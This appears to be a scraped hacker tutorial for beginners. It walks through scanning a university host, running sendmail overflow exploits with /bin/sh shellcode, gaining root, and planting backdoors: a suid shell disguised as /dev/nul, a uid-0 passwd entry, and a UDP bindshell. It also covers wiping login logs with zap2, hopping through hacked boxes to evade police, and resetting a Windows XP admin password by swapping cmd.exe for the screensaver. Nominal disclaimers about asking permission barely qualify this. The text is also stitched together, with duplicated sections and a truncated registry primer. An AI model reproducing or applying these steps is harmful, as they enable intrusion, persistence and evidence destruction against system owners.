Welcome to target.edu
login: luser
Password: (it doesn't display)
Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.
sh-2.03$ whoami
luser
Are we lusers?
sh-2.03$ su root
Password:
Don't think so...
sh-2.03$ whoami
root
sh-2.03$
Let's see what happened. We've stolen the password file (/etc/shadow) using an exploit.
Then, let's suppose we've extracted the password from luser and root. We can't login as
root so we login as luser and run su. su asks us for the root password, we put it and...
rooted!!
The problem here is that is not easy to extract a root password from a password file.
Only 1/10 admins are idiot enough to choose a crackable password like a dictinonary word
or a person's name.
I said some admins are idiot (some of them are smart), but lusers are the more most
idiotest thing on a system. You'll find that luser's passwords are mostly easyly cracked,
you'll find that lusers set up rlogin doors for you to enter without a password, etc.
Not to mention what happens when an admin gives a normal luser administrator priviledges
with sudo or something.
To learn how to crack a password file and extract its passwords, download a document called
"cracking UNIX passwords" by Zebal.
Of course, I haven't listed all the exploit kinds that exist, only the most common.
Putting backdoors
~~~~~~~~~~~~~~~~~
Ok, we've rooted the system. Then what?
Now you're able to change the webpage of that .edu box. Is that what you want to do?
Notice that doing such a thing is LAMER attitude. everyone out there can hack an .edu
box, but they're not ashaming them with such things.
Hacktivism is good and respected. You can change the page of bad people with bad ideologies
like nazis, scienciologists, bsa.org, microsoft, etc. Not a bunch of poor educators.
REMEMBER: ask for permission first!
No, this time you should do another thing. You should keep that system for you to play with
as a toy! (remember: your_box --> lame_box --> victim's box)
Once we type "exit" on our login shell, we're out. And we gotta repeat all the process to get
back in.
And it may not be possible:
- the admin changed his password to something uncrackable.
- they updated sendmail to a newer version so the exploit doesn't work.
So now we're root and we can do everything, we shall put some backdoors that let us get back in.
Anyway, i'll explain the basics of it.
1.How to make a sushi:
To make a sushi or suid shell, we gotta copy /bin/sh to some hidden place and give it suid
permissions:
sh-2.03$ cp /bin/sh /dev/nul
In the strange case the admin looks at /dev, he wouldn't find something unusual cause
/dev/null does exist (who notices the difference?).
sh-2.03$ cd /dev
sh-2.03$ chown root nul
Should yet be root-owned, but anyway...
sh-2.03$ chmod 4775 nul
4775 means suid, note that "chmod +s nul" wouldn't work on some systems but this works everywhere.
We've finished our 'duty', let's logout:
sh-2.03$ exit
Then, when we come back some day:
sh-2.03$ whoami
luser
sh-2.03$ /dev/nul
sh-2.03$ whoami
root
We're superluser again!
There's one problem: actually most shells drop suid permissions, so the sushi doesn't work.
we'd upload then the shell we want and make a sushi with it.
The shell we want for this is SASH. A stand-alone shell with built-in commands.
This one doesn't drop suid perms, and the commands are built-in, so external commands
can't drop perms too! Remember to compile it for the architecture of the target box.
2.How to add fake lusers.
You gotta manipulate the users file: /etc/passwd
try this:
sh-2.03$ pico /etc/passwd
if it doesn't work, try this:
sh-2.03$ vi /etc/passwd
Of course, you must learn how to use vi.
This is what a luser line looks like: luser:passwd:uid:gid:startdir:shell
When uid=0 and gid=0, that luser gets superluser priviledges.
Then we add a line like this:
dood::0:0:dood:/:/bin/sh (put it in a hidden place)
So, once we get a shell, we type:
sh-2.03$ su dood
sh-2.03$ whoami
dood
And now we're root because dood's uid=0 and gid=0.
Smart admins usually look for anomalities on /etc/passwd. The best way is to use a fake
program in /bin that executes the shell you want with suid perms.
I haven't got such a program at my site, but it shouldn't be difficult to develope.
3.How to put a bindshell.
A bindshell is a daemon, it's very similar to telnetd (in fact, telnetd is a bindshell).
The case is this is our own daemon. The good bindshells will listen to an UDP port (not TCP)
and give a shell to you when you connect. The cool thing of UDP is this:
If the admin uses a scanner to see what TCP ports are open, he woldn't find anything!
They rarely remember UDP exists.
You can get an UDP bindshell coded by !hispahack from my site.
Cleaning up
~~~~~~~~~~~
Remember when we logedin to target.edu as luser, and used su to become root?
Take a look to this line:
Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.
Yes, that was displayed by the target box when we logedin there.
It refers to the last login that the real luser did.
So, what will be displayed when luser logsin again?
Last login: Sun Sep 24 10:32:14 from .
Then luser writes a mail to the admin:
"It has happen some strange thing, when I loggedin today, I've read a line like this:
Last login: Sun Sep 24 10:32:14 from .
Does it mean I did login yesterday? It can't be, I don't work on sundays!
I think it's a bug and this is your fault."
The admin responds to luser:
"That wasn't a bug! this line means someone acceded the system using your password, don't
worry for that, we got his IP. That means we can ask his ISP what phone number did call
at 10:32 and get . Then we shall call the police and he'll get busted"
So you'll get busted because luser was a bit clever (sometimes happens).
So we gotta find a way to delete that.
This information can be stored in:
/usr/adm/lastlog
/var/adm/lastlog
/var/log/lastlog
and we can erase it using lled (get it from my site)
lled gots a buitin help that explains how to use it, remember to chmod the fake file
created by lled like the substitute lastlog file.
There is also some information we'd like to erase:
Remember when i told you not to use FTP? Well, in case you did it, you must now
use wted to clean up. Its sintax is very similar to lled.
you can get it from my site.
The who command shows us (and the admin) which lusers are logedin at the moment.
What if we login and the admin is there?
sh-2.03$ who
root tty1 Sep 25 18:18
Then we shall use zap2. If you loggedin as 'luser', then type:
sh-2.03$ ./zap2 luser
Zap2!
sh-2.03$ who
sh-2.03$
And luser has never been here.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Introduction
~~~~~~~~~~~~
If you are a hacker, you read this, and find something that's not correct or you don't like,
i want to know. mail me.
I'm sure you'll find a lot of bad-grammars. Don't report them cause I'm not english and
i don't care at all as long as it's understandable.
When you finish reading it, please TELL ME how you like it!
COPYING: You're welcome to distribute this document to whoever the hell you want, post it
on your website, on forums, newsgroups, etc, AS LONG as you DON'T MODIFY it at all.
If you want to perform it, ask me for permission. thanks a lot!
DISCLAIMER: This document is intended for ludical or educational purposes. I don't want to
promote computer crime and I'm not responible of your actions in any way.
If you want to hack a computer, do the decent thing and ask for permission first.
Let's start
~~~~~~~~~~~
If you read carefully all what i'm telling here, you are smart and you work hard on it,
you'll be able to hack. i promise. That doesn't really make you a hacker (but you're on the way).
A hacker is someone who is able to discover unknown vulnerabilities in software and able to
write the proper codes to exploit them.
NOTE: If you've been unlucky, and before you found this document, you've readen the
guides to (mostly) harmless hacking, then forget everything you think you've learnt from them.
You won't understand some things from my tutorial until you unpoison your brain.
Some definitions
~~~~~~~~~~~~~~~~
I'm going to refer to every kind of computer as a box, and only as a box.
This includes your PC, any server, supercomputers, nuclear silos, HAL9000,
Michael Knight's car, The Matrix, etc.
The systems we're going to hack (with permission) are plenty of normal users, whose
don't have any remote idea about security, and the root. The root user is called
superuser and is used by the admin to administer the system.
I'm going to refer to the users of a system as lusers. Logically, I'll refer to
the admin as superluser.
Operating Systems
~~~~~~~~~~~~~~~~~
Ok, I assume you own a x86 box (this means an intel processor or compatible) running windoze9x,
or perhaps a mac (motorola) box running macOS.
You can't hack with that. In order to hack, you'll need one of those UNIX derived operating
systems.
This is for two main reasons:
-the internet is full of UNIX boxes (windoze NT boxes are really few) running webservers and
so on. to hack one of them, you need a minimun knowledge of a UNIX system, and what's better
than running it at home?
-all the good hacking tools and exploit codes are for UNIX. You won't be able to use them unless
you're running some kind of it.
Let's see where to find the unix you're interested on.
The UNIX systems may be divided in two main groups:
- commercial UNIXes
- free opensource UNIXes
A commercial unix's price is not like windoze's price, and it usually can't run on your box,
so forget it.
The free opensource UNIXes can also be divided in:
- BSD
These are older and difficult to use. The most secure OS (openBSD) is in this group.
You don't want them unless you're planning to install a server on them.
- Linux
Easy to use, stable, secure, and optimized for your kind of box. that's what we need.
I strongly suggest you to get the SuSE distribution of Linux.
It's the best one as i think, and i added here some tips for SuSE, so all should be easier.
Visit http://www.suse.de/ and look for a local store or order it online.
(i know i said it the software was free, but not the CDs nor the manual nor the support.
It is much cheaper than windoze anyway, and you are allowed to copy and distribute it)
If you own an intel box, then order the PC version.
If you own a mac box, then order the PowerPC version.
Whatever you do, DON'T PICK THE COREL DISTRIBUTION, it sucks.
It's possible you have problem with your hardware on the installation. Read the manual, ask
for technical support or buy new hardware, just install it as you can.
This is really important! READ THE MANUAL, or even buy a UNIX book.
Books about TCP/IP and C programming are also useful.
If you don't, you won't understand some things i'll explain later. And, of course, you'll
never become a hacker if you don't read a lot of that 'literature'.
the Internet
~~~~~~~~~~~~
Yes! you wanted to hack, didn't you? do you want to hack your own box or what?
You want to hack internet boxes! So lets connect to the internet.
Yes, i know you've gotten this document from the internet, but that was with windoze
and it was much easier. Now you're another person, someone who screams for knowledge and wisdom.
You're a Linux user, and you gotta open your way to the Internet.
You gotta make your Linux box to connect to the net,
so go and set up your modem (using YaST2 in SuSE).
Common problems:
If your box doesn't detect any modems, that probably means that you have no modem installed
:-D (not a joke!).
Most PCI modems are NOT modems, but "winmodems". Winmodems, like all winhardware, are
specifically designed to work ONLY on windoze. Don't blame linux, this happens because the
winmodem has not a critical chip that makes it work. It works on windoze cause the vendor
driver emulates that missing chip. And hat vendor driver is only available for windoze.
ISA and external modems are more probably real modems, but not all of them.
If you want to make sure wether a modem is or not a winmodem, visit http://start.at/modem.
Then use your modem to connect to your ISP and you're on the net. (on SuSE, with wvdial)
NOTE: Those strange and abnormal online services like aol are NOT ISPs. You cannot connect the
internet with aol. You can't hack with aol. i don't like aol. aol sucks.
Don't worry, we humans are not perfect, and it's probably not your fault. If that is your case,
leave aol and get a real ISP. Then you'll be forgiven.
Don't get busted
~~~~~~~~~~~~~~~~
Let's suppose you haven't skipped everything below and your Linux bow is now connected to the net.
It's now turn for the STEALTH. You won't get busted! just follow my advices and you'll be safe.
- Don't hack
this is the most effective stealth technique. not even the FBI can bust you. :-)
If you choose this option, stop reading now, cause the rest is worthless and futile.
- If you change a webpage, DON'T SIGN! not even with a fake name. they can trace you, find
your own website oe email address, find your ISP, your phone number, your home...
and you get busted!!
- be PARANOID, don't talk about hacking to anyone unless he is really interested in hacking too.
NEVER tell others you've hacked a box.
- NEVER hack directly from your box (your_box --> victim's box).
Always use a third box in the middle (your_box --> lame_box --> victim's box).
Where lame_box is a previously hacked box or...a shell account box!
A shell account is a service where you get control of a box WITHOUT hacking it.
There are a few places where shell accounts are given for free. One of them is nether.net.
- Don't hack dangerous boxes until you're a real hacker.
Which boxes are dangerous:
Military boxes
Government boxes
Important and powerful companies' boxes
Security companies' boxes
Which boxes are NOT dangerous:
Educational boxes (any .edu domain)
Little companies' boxes
Japanese boxes
- Always connect to the internet through a free and anonymous ISP
(did i tell you that AOL is NOT an ISP?)
- Use phreking techniques to redirect calls and use others' lines for your ISP call.
Then it'll be really difficult to trace you. This is not a guide to phreaking anyway.
TCP ports and scanning
~~~~~~~~~~~~~~~~~~~~~~
Do you got your stealth linux box connected to the internet (not aol)?
Have you read the manual as i told you?
Then we shall start with the damn real thing.
First of all, you should know some things about the internet. It's based on the TPC/IP protocol,
(and others)
It works like this: every box has 65k connection PORTS. some of them are opened and waiting for
your data to be sent.
So you can open a connection and send data to any these ports. Those ports are associated with
a service:
Every service is hosted by a DAEMON. Commonly, a daemon or a server is a program that runs
on the box, opens its port and offers their damn service.
here are some common ports and their usual services (there are a lot more):
Port number Common service Example daemon (d stands for daemon)
21 FTP FTPd
23 Telnet telnetd
25 SMTP sendmail (yes!)
80 HTTP apache
110 POP3 qpop
Example:
when you visit the website http://www.host.com/luser/index.html, your browser does this:
-it connects to the TCP port 80
-it sends the string: "GET /HTTP/1.1 /luser/index.html" plus two 'intro'
(it really sends a lot of things more, but that is the essential)
-the host sends the html file
The cool thing of daemons is they have really serious security bugs.
That's why we want to know what daemons are running there, so...
We need to know what ports are opened in the box we want to hack.
How could we get that information?
We gotta use a scanner. A scanner is a program that tries to
connect to every port on the box and tells which of them are opened.
The best scanner i can think of is nmap, created by Fyodor.
You can get nmap from my site in tarball or rpm format.
Let's install nmap from an .rpm packet.
bash-2.03$ rpm -i nmap-2.53-1.i386.rpm
then we run it:
bash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
110/tcp open pop3
Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds
Nmap has told us which ports are opened on target.edu and thus, what services it's offering.
I know, i said telnet is a service but is also a program (don't let this confuse you).
This program can open a TCP connection to the port you specify.
So lets see what's on that ports.
On your linux console, type:
bash-2.03$ telnet target.edu 21
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu FTP server (SunOS 5.6) ready.
quit
221 Goodbye.
Connection closed by foreign host.
You see?
They speak out some valuable information:
-their operating system is SunOS 5.6
-their FTP daemon is the standard provided by the OS.
bash-2.03$ telnet target.edu 25
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0
400 (EDT)
quit
221 2.0.0 target.edu closing connection
Connection closed by foreign host.
They like to tell us everything:
-their SMTP daemon is sendmail
-its version is 8.11.0/8.9.3
Experiment with other ports to discover other daemons.
Why is this information useful to us? cause the security bugs that can let us in depend
on the OS and daemons they are running.
But there is a problem here... such information can be faked!
It's difficult to really know what daemons are they running, but we can know FOR SURE
what's the operating system:
bash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
110/tcp open pop3
TCP Sequence Prediction: Class=random positive increments
Difficulty=937544 (Good luck!)
Remote operating system guess: Linux 2.1.122 - 2.2.14
Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds
Hey wasn't it SunOS 5.6? Damn they're a bunch of lame fakers!
We know the host is running the Linux 2.x kernel. It'd be useful to know also the distribution,
but the information we've already gathered should be enough.
This nmap feature is cool, isn't it? So even if they've tried to fool us, we can know
what's the OS there and its very difficult to avoid it.
Also take a look to the TCP Sequence Prediction. If you scan a host and nmap tells
you their difficulty is low, that means their TCP sequence is predictable and we
can make spoofing attacks. This usually happens with windoze (9x or NT) boxes.
Ok, we've scanned the target. If the admins detect we've scanned them, they could get angry.
And we don't want the admins to get angry with us, that's why we used the -sS option.
This way (most) hosts don't detect ANYTHING from the portscan.
Anyway, scanning is LEGAL so you shouldn't have any problems with it. If you want a better
usage of nmap's features, read its man page:
bash-2.03$ man nmap
How to upload and compile programs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The most obvious and simple way is using FTP:
bash-2.03$ ls
program.c
sh-2.03$ ftp target.edu
Connected to target.edu.
220 target.edu FTP server (SunOS 5.6) ready.
Name: luser
331 Password required for luser.
Password:
230 User luser logged in.
ftp> put program.c
200 PORT command successful.
150 ASCII data connection for program.c (204.42.253.18,57982).
226 Transfer complete.
ftp> quit
221 Goodbye.
But this is not a really good way. It can create logs that will make the admin to detect us.
Avoid uploading it with FTP as you can, use cut&paste instead.
Here's how to make it:
we run a text editor
sh-2.03$ pico exploit.c
if it doesn't work, try this one:
sh-2.03$ vi exploit.c
Of course, you must learn how to use vi.
Then open another terminal (i mean without x windows, CTRL+ALT+Fx to scape from xwindows to x,
ALT+Fx to change to another terminal, ALT+F7 to return xwindows) on your own box and cut the
text from it. Change to your target and paste the code so you've 'uploaded' the file.
To cut a text from the screen, you need to install the gpm packet from your linux distribution.
This program lets you select and cut text with your mouse.
If cut&paste doesn't work, you can also type it by hand (they aren't usually large).
Once you get the .c file there, here's how to compile:
sh-2.03$ gcc program.c -o program
and execute:
sh-2.03$ ./program
Exploiting vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~
This is the most important part of our hacking experience. Once we know what target.edu
is running, we can go to one of those EXPLOIT databases that are on the net.
A exploit is a piece of code that exploits a vulnerability on its software. In the case of
target.edu, we should look for an adequate exploit for sendmail 8.11.0 or any other daemon
that fits. Note that sendmail is the buggiest and the shittiest daemon, thus the most easy
exploitable. If your target gots an old version, you'll probably get in easyly.
When we exploit a security bug, we can get:
- a normal shell (don't know what a shell is? read a book of unix!)
a shell is a command interpreter. for example, the windoze 'shell' is the command.com file.
this one lets us send commands to the box, but we got limited priviledges.
- a root shell
this is our goal, once we're root, we can do EVERYTHING on our 'rooted' box.
These are some exploit databases i suggest you to visit:
http://www.hack.co.za/
http://www.r00tabega.org/
http://www.rootshell.com/
http://www.securityfocus.com/
www.insecure.org/sploits.html
Every exploit is different to use, so read its text and try them.
They usually come in .c language.
The most standar and easy to use exploits are buffer overflows.
I won't explain here how a buffer overflow does work,
Read "Smash The Stack For Fun And Profit" by Aleph One to learn it.
Buffer overflows fool a program (in this case sendmail) to make it execute the code you want.
This code usually executes a shell, so it's called 'shellcode'. The shellcode to run a shell
is different to every OS, so this is a strong reason to know what OS they're running.
We edit the .c file we've downloaded and look for something like this:
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
This is a shellcode for Linux. It will execute /bin/sh, that is, a shell.
You gotta replace it by the shellcode for the OS your target is running.
You can find shellcodes for most OSes on my site or create your own by reading
the text i mentioned before (Smash The Stack For Fun And Profit).
IMPORTANT: before continuing with the practice, ask your target for permission to hack them.
if they let you do it, then you shall continue.
if they don't give you permission, STOP HERE and try with another one.
shall you continue without their permission, you'd be inquiring law and
i'm not responible of your craziness in any way!!!
You should have now the shell account, this is the time to use it!
everything i explain on this section, do it through your shell account:
bash-2.03$ telnet myshellaccount 23
Trying xx.xx.xx.xx...
Connected to yourshellaccount.
Escape character is '^]'.
Welcome to yourshellaccount
login: malicioususer
Password: (it doesn't display)
Last login: Fry Sep 15 11:45:34 from .
sh-2.03$
Here is a example of a buffer overflow (that doesn't really exist):
we compile it:
sh-2.03$ gcc exploit.c -o exploit
we execute it:
sh-2.03$ ./exploit
This is a sendmail 8.9.11 exploit
usage: ./exploit target port
Sendmail works on port 25, so:
sh-2.03$./exploit 25 target.edu
Cool, '$' means we got a shell! Let's find out if we're root.
$whoami
root
Damn, we've rooted target.edu!
$whyamiroot
because you've hacked me! :-) (just kidding)
There are some exploits that don't give you root directly, but a normal shell.
It depends on what luser is running the daemon. (sendmail is usually root)
Then you'll have to upload a .c file with a local (local means it can't overflow
a daemon, but a local program) overflow and compile it.
Remember to avoid uploading it with FTP as you can.
Other kind of exploit is the one that gives you access to the password file.
If a host gots port 23 (telnet) opened, we can login as a normal user
(remote root logins are usually not allowed) by putting his/hers/its username
and password. Then use the su command to become root.
sh-2.03$ telnet target.edu 23
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
We're running SunOS 5.7
Welcome to target.edu
login: luser
Password: (it doesn't display)
Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.
sh-2.03$ whoami
luser
Are we lusers?
sh-2.03$ su root
Password:
Don't think so...
sh-2.03$ whoami
root
sh-2.03$
Let's see what happened. We've stolen the password file (/etc/shadow) using an exploit.
Then, let's suppose we've extracted the password from luser and root. We can't login as
root so we login as luser and run su. su asks us for the root password, we put it and...
rooted!!
The problem here is that is not easy to extract a root password from a password file.
Only 1/10 admins are idiot enough to choose a crackable password like a dictinonary word
or a person's name.
I said some admins are idiot (some of them are smart), but lusers are the more most
idiotest thing on a system. You'll find that luser's passwords are mostly easyly cracked,
you'll find that lusers set up rlogin doors for you to enter without a password, etc.
Not to mention what happens when an admin gives a normal luser administrator priviledges
with sudo or something.
To learn how to crack a password file and extract its passwords, download a document called
"cracking UNIX passwords" by Zebal.
Of course, I haven't listed all the exploit kinds that exist, only the most common.
Putting backdoors
~~~~~~~~~~~~~~~~~
Ok, we've rooted the system. Then what?
Now you're able to change the webpage of that .edu box. Is that what you want to do?
Notice that doing such a thing is LAMER attitude. everyone out there can hack an .edu
box, but they're not ashaming them with such things.
Hacktivism is good and respected. You can change the page of bad people with bad ideologies
like nazis, scienciologists, bsa.org, microsoft, etc. Not a bunch of poor educators.
REMEMBER: ask for permission first!
No, this time you should do another thing. You should keep that system for you to play with
as a toy! (remember: your_box --> lame_box --> victim's box)
Once we type "exit" on our login shell, we're out. And we gotta repeat all the process to get
back in.
And it may not be possible:
- the admin changed his password to something uncrackable.
- they updated sendmail to a newer version so the exploit doesn't work.
So now we're root and we can do everything, we shall put some backdoors that let us get back in.
Anyway, i'll explain the basics of it.
1.How to make a sushi:
To make a sushi or suid shell, we gotta copy /bin/sh to some hidden place and give it suid
permissions:
sh-2.03$ cp /bin/sh /dev/nul
In the strange case the admin looks at /dev, he wouldn't find something unusual cause
/dev/null does exist (who notices the difference?).
sh-2.03$ cd /dev
sh-2.03$ chown root nul
Should yet be root-owned, but anyway...
sh-2.03$ chmod 4775 nul
4775 means suid, note that "chmod +s nul" wouldn't work on some systems but this works everywhere.
We've finished our 'duty', let's logout:
sh-2.03$ exit
Then, when we come back some day:
sh-2.03$ whoami
luser
sh-2.03$ /dev/nul
sh-2.03$ whoami
root
We're superluser again!
There's one problem: actually most shells drop suid permissions, so the sushi doesn't work.
we'd upload then the shell we want and make a sushi with it.
The shell we want for this is SASH. A stand-alone shell with built-in commands.
This one doesn't drop suid perms, and the commands are built-in, so external commands
can't drop perms too! Remember to compile it for the architecture of the target box.
2.How to add fake lusers.
You gotta manipulate the users file: /etc/passwd
try this:
sh-2.03$ pico /etc/passwd
if it doesn't work, try this:
sh-2.03$ vi /etc/passwd
Of course, you must learn how to use vi.
This is what a luser line looks like: luser:passwd:uid:gid:startdir:shell
When uid=0 and gid=0, that luser gets superluser priviledges.
Then we add a line like this:
dood::0:0:dood:/:/bin/sh (put it in a hidden place)
So, once we get a shell, we type:
sh-2.03$ su dood
sh-2.03$ whoami
dood
And now we're root because dood's uid=0 and gid=0.
Smart admins usually look for anomalities on /etc/passwd. The best way is to use a fake
program in /bin that executes the shell you want with suid perms.
I haven't got such a program at my site, but it shouldn't be difficult to develope.
3.How to put a bindshell.
A bindshell is a daemon, it's very similar to telnetd (in fact, telnetd is a bindshell).
The case is this is our own daemon. The good bindshells will listen to an UDP port (not TCP)
and give a shell to you when you connect. The cool thing of UDP is this:
If the admin uses a scanner to see what TCP ports are open, he woldn't find anything!
They rarely remember UDP exists.
You can get an UDP bindshell coded by !hispahack from my site.
Cleaning up
~~~~~~~~~~~
Remember when we logedin to target.edu as luser, and used su to become root?
Take a look to this line:
Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.
Yes, that was displayed by the target box when we logedin there.
It refers to the last login that the real luser did.
So, what will be displayed when luser logsin again?
Last login: Sun Sep 24 10:32:14 from .
Then luser writes a mail to the admin:
"It has happen some strange thing, when I loggedin today, I've read a line like this:
Last login: Sun Sep 24 10:32:14 from .
Does it mean I did login yesterday? It can't be, I don't work on sundays!
I think it's a bug and this is your fault."
The admin responds to luser:
"That wasn't a bug! this line means someone acceded the system using your password, don't
worry for that, we got his IP. That means we can ask his ISP what phone number did call
at 10:32 and get . Then we shall call the police and he'll get busted"
So you'll get busted because luser was a bit clever (sometimes happens).
So we gotta find a way to delete that.
This information can be stored in:
/usr/adm/lastlog
/var/adm/lastlog
/var/log/lastlog
and we can erase it using lled (get it from my site)
lled gots a buitin help that explains how to use it, remember to chmod the fake file
created by lled like the substitute lastlog file.
There is also some information we'd like to erase:
Remember when i told you not to use FTP? Well, in case you did it, you must now
use wted to clean up. Its sintax is very similar to lled.
you can get it from my site.
The who command shows us (and the admin) which lusers are logedin at the moment.
What if we login and the admin is there?
sh-2.03$ who
root tty1 Sep 25 18:18
Then we shall use zap2. If you loggedin as 'luser', then type:
sh-2.03$ ./zap2 luser
Zap2!
sh-2.03$ who
sh-2.03$
And luser has never been here.
hack windows XP passwrd!!
Here are the steps involved to Hack the Window XP Administrator Password .
1. Go to Start –> Run –> Type in CMD 2. You will get a command prompt. Enter these commands the way it is given 3. cd\ 4. cd\ windows\system32 5. mkdir temphack 6. copy logon.scr temphack\logon.scr 7. copy cmd.exe temphack\cmd.exe 8. del logon.scr 9. rename cmd.exe logon.scr 10. exit
Wait its not over read the rest to find out how to Hack the Window XP Administrator PasswordA Brief explanation of what you are currently doing here is
Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called mkdir. After which you are copying or backing up the logon.scr and cmd.exe files into the mkdir then you are deleting the logon.scr file and renaming cmd.exe file to logon.scr.
So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command
net user password
Example: If the admin user name is clazh and you want change the password to pass Then type in the following command
net user clazh pass
This will chang the admin password to pass.Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.
Here are the steps involved to De Hack or restore the Window XP Administrator Password to cover your tracks.
1. Go to Start –> Run –> Type in CMD 2. You will get a command prompt. Enter these commands the way it is given 3. cd\ 4. cd\ windows\system32\temphack 5. copy logon.scr C:\windows\system32\logon.scr 6. copy cmd.exe C:\windows\system32\cmd.exe 7. exit
Or simply go to C:\windows\system32\temphack and copy the contents of temphack back into system32 directory click Yes to overwrite the modified files.
Via internetbusinessdaily.net
Note To administrators: You can block the entire password change thing just a little tweak in the local security policy (control panel->administrative tools,works only for administrators group) will disallow any change in password even if u r the Admin (u can put a number of other restrictions too), but be cautious to give other users limitted accounts. After you have done this, the above Screensaver technique will fail.
Update: Christian Mohn points out The Above method is is possible only if you have Local Administrator Privileges. My fault for not checking it up before posting.
Update: The above Method only works if the system is FAT/FAT32 - because of the updated “user rights management” in NTFS - file level rights etc. This does not work on a system using NTFS.
1. Go to Start –> Run –> Type in CMD 2. You will get a command prompt. Enter these commands the way it is given 3. cd\ 4. cd\ windows\system32 5. mkdir temphack 6. copy logon.scr temphack\logon.scr 7. copy cmd.exe temphack\cmd.exe 8. del logon.scr 9. rename cmd.exe logon.scr 10. exit
Wait its not over read the rest to find out how to Hack the Window XP Administrator PasswordA Brief explanation of what you are currently doing here is
Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called mkdir. After which you are copying or backing up the logon.scr and cmd.exe files into the mkdir then you are deleting the logon.scr file and renaming cmd.exe file to logon.scr.
So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command
net user password
Example: If the admin user name is clazh and you want change the password to pass Then type in the following command
net user clazh pass
This will chang the admin password to pass.Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.
Here are the steps involved to De Hack or restore the Window XP Administrator Password to cover your tracks.
1. Go to Start –> Run –> Type in CMD 2. You will get a command prompt. Enter these commands the way it is given 3. cd\ 4. cd\ windows\system32\temphack 5. copy logon.scr C:\windows\system32\logon.scr 6. copy cmd.exe C:\windows\system32\cmd.exe 7. exit
Or simply go to C:\windows\system32\temphack and copy the contents of temphack back into system32 directory click Yes to overwrite the modified files.
Via internetbusinessdaily.net
Note To administrators: You can block the entire password change thing just a little tweak in the local security policy (control panel->administrative tools,works only for administrators group) will disallow any change in password even if u r the Admin (u can put a number of other restrictions too), but be cautious to give other users limitted accounts. After you have done this, the above Screensaver technique will fail.
Update: Christian Mohn points out The Above method is is possible only if you have Local Administrator Privileges. My fault for not checking it up before posting.
Update: The above Method only works if the system is FAT/FAT32 - because of the updated “user rights management” in NTFS - file level rights etc. This does not work on a system using NTFS.
vat is registry??
The Registry Torn Apart --- ____________________________________________________________________________
The registry is a hierarchical database that contains virtually all information about your computer's configuration. Under previous version of Windows, those setting where contained in files like config.sys, autoexec.bat, win.ini, system.ini, control.ini and so on. From this you can understand how important the registry is. The structure of the registry is similar to the ini files structure, but it goes beyond the concept of ini files because it offers a hierarchical structure, similar to the folders and files on hard disk. In fact the procedure to get to the elements of the registry is similar to the way to get to folders and files. In this section I would be examing the Win95\98 registry only although NT is quite similar.
The Registry EditorThe Registry Editor is a utility by the filename regedit.exe that allows you to see, search, modify and save the registry database of Windows. The Registry Editor doesn't validate the values you are writing: it allows any operation. So you have to pay close attention, because no error message will be shown if you make a wrong operation. To launch the Registry Editor simply run RegEdit.exe ( under WinNT run RegEdt32.exe with administer privileges). The registry editor is divided into two sectios in the left one there is a hierarchical structure of the database (the screen looks like Windows Explorer) in the right one there are the values. The registry is organized into keys and subkeys. Each key contains a value entry , each one has a name, a type or a class and the value itself. The name is a string that identifies the value to the key. The length and the format of the value is dependent on the data type.
As you can see with the Registry Editor, the registry is divided into five principal keys: there is no way to add or delete keys at this level. Only two of these keys are effectively saved on hard disk: HKEY_LOCAL_MACHINE and HKEY_USERS. The others are jusr branches of the main keys or are dynamically created by Windows.
HKEY_LOCAL_MACHINE This key contains any hardware, applications and services information. Several hardware information is updated automatically while the computer is booting. The data stored in this key is shared with any user. This handle has many subkeys:
Config Contains configuration data for different hardware configurations. Enum This is the device data. For each device in your computer, you can find information such as the device type, the hardware manufacturer, device drivers and the configuration. Hardware This key contains a list of serial ports, processors and floating point processors.Network Contains network information. Security Shows you network security information. Software This key contains data about installed software.System It contains data that checks which device drivers are used by Windows and how they are configured.
HKEY_CLASSES_ROOT This key is an alias of the branch HKEY_LOCAL_MACHINE\Software\Classes and contains OLE, drag'n'drop, shortcut and file association information.
HKEY_CURRENT_CONFIG This key is also an alias. It contains a copy of the branch HKEY_LOCAL_MACHINE\Config, with the current computer configuration.
HKEY_DYN_DATA Some information stored in the registry changes frequently, so Windows maintains part of the registry in memory instead of on the hard disk. For example it stores PnP information and computer performance. This key has two sub keys
